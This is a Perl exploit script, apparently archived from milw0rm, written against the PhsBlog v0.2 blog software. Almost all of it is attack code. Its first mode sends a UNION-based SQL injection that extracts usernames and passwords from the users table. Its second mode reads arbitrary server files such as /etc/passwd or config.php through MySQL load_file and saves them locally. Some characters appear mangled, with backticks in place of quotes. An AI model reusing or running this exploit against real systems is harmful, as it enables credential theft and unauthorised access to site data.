phsBlog 0.2 Bypass SQL Injection Filtering Exploit#!/usr/bin/perl #---------------------------------------------------------------- # #Script : PhsBlog v0.2 # #Type : Bypass Sql injection Filtering Exploit # #Method : GET # #Risk : High # #---------------------------------------------------------------- # #Discovered by : Khashayar Fereidani a.k.a. Dr.Crash # #My Official Website : HTTP://FEREIDANI.IR # #Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com # #---------------------------------------------------------------- # #Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR # #---------------------------------------------------------------- # #Script Download : http://www.phsdev.com/downloads/phsblog_current.zip # #---------------------------------------------------------------- # # Tnx : God # # HTTP://IRCRASH.COM # #---------------------------------------------------------------- use LWP; use HTTP::Request; use Getopt::Long; $scriptname=`PhsBlog v0.2`; sub header { print ` **************************************************** * $scriptname **************************************************** *Discovered by : Khashayar Fereidani * *Exploited by : Khashayar Fereidani * *My Official Website : http://fereidani.ir * ****************************************************`; } sub usage { print ` * Usage : perl $0 http://Example/ **************************************************** `; } $url = ($ARGV[0]); if(!$url) { header(); usage(); exit; } if($url !~ /\//){$url = $url.`/`;} if($url !~ /http:\/\//){$url = `http://`.$url;} sub xpl1() { #concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e) $vul = `/index.php?sql_cid=999'union+select+0,1,2,3,4,concat(0x4c6f67696e3a,username,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),6,7,8,9,10,11,12+from+phsblog_users/*`; $requestpage = $url.$vul; my $req = HTTP::Request->new(`POST`,$requestpage); $ua = LWP::UserAgent->new; $ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); #$req->referer($url); $req->referer(`IRCRASH.COM`); $req->content_type('application/x-www-form-urlencoded'); $req->header(`content-length` => $contlen); $req->content($poststring); $response = $ua->request($req); $content = $response->content; $header = $response->headers_as_string(); @name = split(/Login:/,$content); $name = @name[1]; @name = split(//,$name); $name = @name[0]; @password = split(/Password:/,$content); $password = @password[1]; @password = split(//,$password); $password = @password[0]; if(!$name && !$password) { print `\n\n`; print `!Exploit failed ! :(\n\n`; exit; } print `\n Username: `.$name.`\n\n`; print ` Password: ` .$password.`\n\n`; } #XPL2 sub xpl2() { print `\n Example For File Address : /home/user/public_html/config.php\n Or /etc/passwd`; print `\n Enter File Address :`; $fil3 = ; #index.php?sql_cid=999'union+select+0,1,2,3,4,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),6,7,8,9,10,11,12+from+phsblog_users/* $vul = `?show=pickup&sid=99999'+union+select+0,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),2,3,4,5,6,7,8,9,10,11,12,13+from+mysql.user/*`; $requestpage = $url.$vul; my $req = HTTP::Request->new(`POST`,$requestpage); $ua = LWP::UserAgent->new; $ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); #$req->referer($url); $req->referer(`IRCRASH.COM`); $req->content_type('application/x-www-form-urlencoded'); $req->header(`content-length` => $contlen); $req->content($poststring); $response = $ua->request($req); $content = $response->content; $header = $response->headers_as_string(); @name = split(/Login:/,$content); $name = @name[1]; @name = split(//,$name); $name = @name[0]; if(!$name && !$password) { print `\n\n`; print `!Exploit failed ! :(\n\n`; exit; } open (FILE, `>`.source.`.txt`); print FILE $name; close (FILE); print ` File Save In source.txt\n`; print ``; } #XPL2 END #Starting; print ` **************************************************** * $scriptname **************************************************** *Discovered by : Khashayar Fereidani * *Exploited by : Khashayar Fereidani * *My Official Website : http://fereidani.ir * **************************************************** * Mod Options : * * Mod 1 : Find Script username and password * * Mod 2 : File Disclosure(not work in many servers)* ****************************************************`; print `\n \n Enter Mod : `; $mod=; if ($mod==`1` or $mod==`2`) { print `\n Exploiting .............. \n`; } else { print `\n Unknown Mod ! \n Exploit Failed !`; }; if ($mod==`1`) { xpl1(); }; if ($mod==`2`) { xpl2(); }; # milw0rm.com [2008-09-11]